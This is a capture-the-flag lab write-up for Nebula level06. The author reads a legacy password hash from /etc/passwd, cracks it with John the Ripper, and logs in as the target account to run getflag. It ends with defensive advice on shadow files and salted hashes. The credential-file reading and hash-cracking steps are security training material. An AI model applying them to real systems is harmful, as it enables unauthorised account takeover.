Nebula - level06

This is my seventh post on the Nebula series hosted by Exploit Exercises

We start off with understanding what is being asked of us:

About

The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06.

Source code

There is no source code available for this level



With our information in hand, let's SSH into the box as level06 and access the /home/flag06 directory. Knowing that the flag06 account credentials came from a legacy unix system, we cat the /etc/passwd directory and grep for said user:


level06@nebula:/home/flag06$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
level06@nebula:/home/flag06$

So, in legacy unix systems, they used to store the user's password directly in the /etc/passwd file. This password was usually hashed and salted. Now adays, passwords are stored in the /etc/shadow file with very strict access.

Let's pull this down and see if we can crack it. I echo the content to a local file on my machine and run John against it:


eric@geoda:~/Documents/vulnhub/nebula$ echo "flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh" > flag06
eric@geoda:~/Documents/vulnhub/nebula$ sudo john ./flag06
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (flag06)
1g 0:00:00:00 DONE 2/3 (2017-03-04 09:17) 33.33g/s 25000p/s 25000c/s 25000C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed
eric@geoda:~/Documents/vulnhub/nebula$

Success! We cracked the password. I then SSH as flag06 with my password and getflag:


level06@nebula:/home/flag06$ ssh flag06@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
  
      _   __     __          __     
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ / 
  /_/ |_/\___/_.___/\__,_/_/\__,_/  
                                    
    exploit-exercises.com/nebula


For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).


flag06@localhost's password: 
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

flag06@nebula:~$ getflag
You have successfully executed getflag on a target account
flag06@nebula:~$


This shows us how important the /etc/shadow file has become. Rather than leaving passwords inside the /etc/passwd directory (even if it were hashed and salted), allowing a user visibility to this can be costly.

Additionally, always use the strongest hash possible and be sure to use in combination with a salt!

Thanks for reading!

-geoda